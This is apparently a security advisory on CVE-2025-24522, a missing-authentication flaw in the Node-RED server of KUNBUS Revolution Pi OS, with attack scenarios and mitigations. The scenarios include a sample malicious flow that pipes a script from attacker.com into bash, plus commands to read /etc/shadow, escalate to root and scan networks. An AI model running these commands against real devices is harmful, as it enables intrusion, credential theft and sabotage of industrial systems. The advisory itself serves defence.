Critical Vulnerability in KUNBUS Revolution Pi OS

Overview 

A critical security vulnerability, CVE-2025-24522, has been identified in KUNBUS Revolution Pi OS Bookworm (01/2025 release). The flaw stems from missing authentication in the Node-RED server, allowing unauthenticated attackers to gain full control over the Node-RED instance and execute arbitrary commands on the underlying operating system.

With a CVSS-B score of 9.3 (CRITICAL), this vulnerability poses a severe risk to industrial systems and IoT deployments using Revolution Pi devices.(Published Date:05/01/2025)

---

Technical Details

Root Cause

The Node-RED instance in Revolution Pi OS does not enforce authentication by default, meaning:

• The Node-RED dashboard is accessible without credentials.
• Attackers can inject malicious flows, modify existing ones, or execute system commands via Node-RED functions.
• Since Node-RED often runs with elevated privileges, this can lead to full system compromise.

Affected Versions

• KUNBUS Revolution Pi OS Bookworm (01/2025 release)
• Earlier versions may also be vulnerable if Node-RED was not manually secured.

Attack Scenarios

Scenario 1: Remote Exploitation via Exposed Node-RED Dashboard

1. Discovery: An attacker scans the local network or internet-facing Revolution Pi devices and finds an exposed Node-RED dashboard (http://<target-ip>:1880).

2. Unauthenticated Access: Since no authentication is required, the attacker accesses the Node-RED editor.

3. Malicious Flow Injection:

• The attacker creates a new flow with an "exec" node configured to run OS commands (e.g., rm -rf /, wget malware.sh, or reverse shell).

• Example malicious flow:

  json

  Copy

  Download

  [
      {
          "id": "inject-node",
          "type": "inject",
          "payload": "malicious_command",
          "wires": [["exec-node"]]
      },
      {
          "id": "exec-node",
          "type": "exec",
          "command": "sh -c 'curl http://attacker.com/malware.sh | bash'",
          "wires": []
      }
  ]

1. Deployment & Execution:

• The attacker deploys the flow, triggering command execution on the Revolution Pi.

• The attacker gains remote shell access, exfiltrates data, or disrupts operations.

Scenario 2: Lateral Movement in Industrial Networks

1. Initial Access: An attacker compromises a weakly secured Revolution Pi in a factory network.

2. Privilege Escalation:

• Using Node-RED, the attacker runs:

  bash

  Copy

  Download

  cat /etc/shadow   # Extract password hashes  
  sudo su -         # Gain root if Node-RED runs as sudo  

1. Pivoting:

• The attacker scans internal networks (nmap -sn 192.168.1.0/24) and exploits other devices.

• They deploy ransomware or sabotage industrial processes.

Mitigation & Fixes

Immediate Actions

1. Enable Node-RED Authentication:

• Edit /home/pi/.node-red/settings.js and set:

  javascript

  Copy

  Download

  adminAuth: {
      type: "credentials",
      users: [{
          username: "admin",
          password: "$2a$08$hashed_password",
          permissions: "*"
      }]
  }

• Generate a hashed password using:

  bash

  Copy

  Download

  node-red-admin hash-pw

1. Restrict Network Access:

• Use a firewall to block unauthorized access to port 1880.

• Example (ufw):

  bash

  Copy

  Download

  sudo ufw deny 1880  
  sudo ufw allow from 192.168.1.0/24 to any port 1880  

1. Update Revolution Pi OS:

• Check for patches from KUNBUS and apply them immediately.

Long-Term Best Practices

• Disable Node-RED if unused.
• Monitor for suspicious flows (e.g., unexpected exec nodes).
• Segment industrial networks to prevent lateral movement.

Conclusion

CVE-2025-24522 is a critical vulnerability that exposes Revolution Pi devices to remote code execution (RCE) due to missing Node-RED authentication. Attackers can take full control of affected systems, making this a high-priority issue for industrial and IoT environments.

Recommendation: Apply mitigations immediately and monitor for updates from KUNBUS.